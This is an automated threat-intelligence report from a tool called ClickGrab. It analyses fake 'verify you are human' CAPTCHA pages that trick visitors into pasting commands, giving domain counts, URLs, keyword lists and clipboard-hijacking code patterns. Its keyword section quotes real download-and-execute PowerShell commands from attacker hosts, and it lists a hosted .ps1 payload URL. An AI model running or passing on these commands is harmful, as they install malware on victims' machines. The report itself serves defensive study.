ClickGrab Threat Analysis Report - 2025-12-05
Generated on 2025-12-05 02:31:42
Executive Summary
- Total sites analyzed: 24
- Sites with malicious content: 6
- Unique domains encountered: 48
- Total URLs extracted: 342
- PowerShell download attempts: 1
- Clipboard manipulation instances: 20
Domain Analysis
Most Frequently Encountered Domains
- theharadamethod.com: 156 occurrences
- alsaqrdelivery.online: 66 occurrences
- www.webgo.de: 10 occurrences
- www.youtube.com: 9 occurrences
- godprox.cc: 8 occurrences
- svetvip.ru: 8 occurrences
- www.google.com: 6 occurrences
- api.whatsapp.com: 6 occurrences
- www.paypal.com: 5 occurrences
- t.me: 4 occurrences
- mc.yandex.ru: 4 occurrences
- shorturl.at: 4 occurrences
- al-tayer.online: 3 occurrences
- i.postimg.cc: 3 occurrences
- GeorgeTrachilis.com: 3 occurrences
URL Pattern Analysis
reCAPTCHA imagery
5 occurrences across 3 distinct URLs
- https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png (2 times)
- https://2captcha.com/dist/web/assets/google-privacy-policy-Cb0CGVRT.svg (2 times)
- https://pizzabyte.com.au/smartdetection/deviceverification/CF/path/captcha (1 time)
Font resources
12 occurrences across 11 distinct URLs
- https://use.fontawesome.com/releases/v5.0.0/css/all.css (2 times)
- https://theharadamethod.com/wp-content/plugins/pojo-accessibility/assets/build/fonts.css?ver=3.9.0 (1 time)
- https://theharadamethod.com/wp-content/uploads/elementor/google-fonts/css/roboto.css?ver=1743712996 (1 time)
- https://theharadamethod.com/wp-content/uploads/elementor/google-fonts/css/robotoslab.css?ver=1743713009 (1 time)
- https://theharadamethod.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/fontawesome.min.css?ver=5.15.3 (1 time)
- ...and 6 more distinct URLs
CDN hosted scripts
2 occurrences across 2 distinct URLs
- https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1 (1 time)
- https://cdn.elementor.com/a11y/widget.js?api_key=ea11y-0c6bc85a-4178-4d32-97e4-8246ce3105fc&ver=3.9.0 (1 time)
Google resources
11 occurrences across 9 distinct URLs
- https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png (2 times)
- https://2captcha.com/dist/web/assets/google-privacy-policy-Cb0CGVRT.svg (2 times)
- https://www.google.com/intl/en/policies/privacy/ (1 time)
- https://www.google.com/intl/en/policies/terms/ (1 time)
- https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent (1 time)
- ...and 4 more distinct URLs
Suspicious Keyword Analysis
Total Keywords Found: 93 (30 unique)
Keyword Categories
Social Engineering
17 unique keywords
- verification_id
- verification id
- Checking if you are human
- Verification Hash
- verification
- Verification ID
- Verify You Are Human
- Robot
- exec /i https://pizzabyte.com.au/smartdetection/deviceverification/CF/path/captcha";
- verification-id
- ...and 7 more
System Commands
6 unique keywords
- exec(ua) != nuii){rv = parseFioat(RegExp.$i);}}eise if (n.appName == "Netscape"){rv = ii;re = new RegExp("Trident/.*rv:([0-9]+[\.0-9]*)");if (re.exec(ua) != nuii){rv = parseFioat(RegExp.$i);}}}return rv;}})(window, document, navigator)
- command "iwr update.coinmarketsap.com | iex"</code>
- command =powersheii -nop -w h -c "$L='C:\Users\Pubiic\Documents\job.psi'; [IO.Fiie]::WriteAiiBytes($L, (iwr 'http://dadeshobbymarket.net/amzz.jpeg' -UseBasicParsing).Content); powersheii -w h -ep Bypass -f $L";
- command is executed.
- const command =
- exec(
Verification Text
3 unique keywords
- hidden
- ray id
- Hidden
Technical Terms
4 unique keywords
- failed_to_retrieve
- Ray ID
- Bypass
- iex
Most Frequent Keywords
- hidden: 11 occurrences
- robot: 9 occurrences
- CAPTCHA Verification: 5 occurrences
- I am not a robot: 5 occurrences
- Verification: 5 occurrences
- verification: 5 occurrences
- verification-id: 5 occurrences
- To better prove you are not a robot: 5 occurrences
- Robot: 4 occurrences
- iex: 4 occurrences
- Verification ID: 4 occurrences
- Ray ID: 3 occurrences
- Checking if you are human: 3 occurrences
- Verify you are human: 3 occurrences
- verification_id: 2 occurrences
Similar Keyword Patterns
Groups of keywords that appear to be variations of the same theme:
Group 1: CAPTCHA Verification, Verification, verification
Group 2: Verification Hash, verification-id, verification_id, Verification ID, verification id
Group 3: Robot, robot
Group 4: Hidden, hidden
Group 5: Verify You Are Human, Checking if you are human, Verify you are human
JavaScript Obfuscation Analysis
Obfuscation Sophistication Score: 0/7
Potential Base64 Encoded Content
These strings may contain encoded malicious payloads:
- 0cd9a07d5d820b5824de1d92fd5b098b
- com/dist/web/assets/google
- com/recaptcha/about/images/reCAPTCHA
- au/smartdetection/deviceverification/CF/path/captc...
- /bitrix/tools/captcha
Clipboard Manipulation Analysis
Detected clipboard manipulation in 20 instances.
Document.Execcommand Copy
Found in 12 snippets (60.0% of clipboard code)
Examples:
document.execCommand('copy')
document.execCommand("copy")
try { document.execCommand('copy')
Textarea Manipulation
Found in 12 snippets (60.0% of clipboard code)
Examples:
tListener("click", function () { const textarea = document.createElement('textarea'
ng is the safe placeholder above const textarea = document.createElement('textarea'
ipboardCopyData(textToCopy){ const tempTextArea = document.createElement("textarea"
Complete Malicious Functions
Function 1:
function setClipboardCopyData(textToCopy){
    const tempTextArea = document.createElement("textarea");
    tempTextArea.value = textToCopy;
    document.body.append(tempTextArea);
    tempTextArea.select();
    document.execCommand("copy");
    document.body.removeChild(tempTextArea);
}
Clipboard Attack Flow Analysis
Attack Sophistication: 7/7 components detected
Total Technique Instances: 71
Attack Flow Components
The following components show how the clipboard attack is executed:
Element Creation
Creating temporary DOM elements
Instances: 4
Examples: createElement('textarea', createElement("textarea"
Content Injection
Injecting malicious content into elements
Instances: 11
Examples: .value =, .textContent =
DOM Manipulation
Adding elements to the DOM
Instances: 15
Examples: append(, appendChild, body.append
Selection Methods
Selecting content for copying
Instances: 12
Examples: .select()
Clipboard Operations
Executing clipboard copy operations
Instances: 12
Examples: execCommand('copy', execCommand("copy"
Cleanup Operations
Removing temporary elements
Instances: 7
Examples: removeChild
Event Handling
Handling user interactions
Instances: 10
Examples: addEventListener
Malicious Payload Construction
How the final clipboard payload is assembled:
Command Concatenation
Instances: 1
Examples:
- commandToRun +
Verification Text
Instances: 1